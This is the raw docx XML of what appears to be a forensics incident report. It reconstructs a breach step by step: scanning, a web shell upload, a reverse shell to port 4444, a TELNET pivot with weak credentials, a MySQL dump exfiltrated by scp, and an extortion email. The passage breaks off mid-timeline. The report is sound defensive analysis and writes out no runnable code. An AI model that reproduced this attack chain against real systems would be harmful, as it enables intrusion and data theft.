          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Database Tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (phl_database_tables.txt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Extortion Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (email Screenshot 2025-01-07 084517.png)</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Key Correlations with Timelines:</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2. Timeline of Events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attack can be broken down into the following phases, with timestamps from the logs and PCAP files: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Phase 1: Reconnaissance and Initial Access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19/Feb/2022 21:58:22 -0500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Web Server Access Logs):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(IP: 138.68.92.163) begins scanning the web server for vulnerabilities, sending numerous requests to various paths (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/randomfile1</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/frand2</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server responds with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for most requests, indicating the attacker is probing for common files and directories.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uses an outdated User-Agent (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), suggesting automated scanning tools.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19/Feb/2022 21:58:40 -0500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Web Server Access Logs):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successfully accesses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 which has directory listing enabled.</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server responds with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating the attacker can view the contents of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19/Feb/2022 21:59:04 -0500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Web Server Access Logs):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uploads and executes a web shell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 via an HTTP POST request.</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uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl/7.68.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send the POST request, confirming the use of automated tools.</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Wireshark PCAP Analysis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establishes a reverse shell by executing the malicious PHP script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reverse shell connects back to the attacker's IP (138.68.92.163) on port 4444.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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gains remote access to the web server and begins pivoting to the database server.</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Phase 2: Privilege Escalation and Database Access</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20/Feb/2022 03:00:55.682704Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Database Access Logs):</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connects to the MySQL database as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using compromised credentials.</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begins exploring the database structure, querying system tables (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user</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db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tables_priv</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20/Feb/2022 03:01:13.274934Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Database Access Logs):</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switches to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database and queries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retrieves all records from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using the query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM customers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20/Feb/2022 03:01:46.775014Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Database Access Logs):</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performs a full dump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using the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 command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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exports the database to a file (</w:t>
      </w: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and transfers it to an external server (178.62.228.28) using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp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Phase 3: Data Exfiltration and Extortion</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20/Feb/2022 03:01:46.775014Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Database Access Logs):</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successfully exfiltrates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containing sensitive customer information.</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deletes the local dump file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl.db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to cover their tracks.</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07/Jan/2025 08:45:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Extortion Email):</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sends an extortion email to the company, claiming to have possession of the database files.</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email includes a snippet of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confirming that the data was exfiltrated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Key Observation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker demands payment in Bitcoin and threatens to release the data publicly.</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3. Determine Attack Vector</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Based on the analysis and timelines, the attack vector can be summarized as follows:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Initial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1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exploited a misconfigured web server with directory listing enabled on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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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uploaded a web shell (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and executed it to gain remote access to the web server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Privilege Escalation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pivoted from the web server to the database server using TELNET.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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used weak credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl/phl123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to log into the database server and escalated privileges to access the MySQL database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Exfiltration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The attacker dumped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using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 and exfiltrated the data to an external server.</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Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALYSIS</w:t>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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of events and additional recommendations for remediation:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>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Timeline of Events</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>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1. Initial Bot Activity (21:56:11 - 21:57:40)</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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21:56:11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">136.243.111.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes a GET request to the root URL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SiteCheckerBotCrawler/1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user agent.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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21:56:13 - 21:57:40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">138.201.202.232</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes multiple GET requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/?_escaped_fragment_=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, also using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SiteCheckerBotCrawler/1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user agent. This appears to be a benign web crawler scanning the site.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>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2. Suspicious Scanning Activity (21:58:22 - 21:58:40)</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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21:58:22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">138.68.92.163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> begins making a large number of GET requests to various paths on the server, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/randomfile1</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/frand2</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/index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and many others. Most of these requests return a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code, indicating that the requested resources do not exist.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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21:58:32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker successfully accesses the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, which returns a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
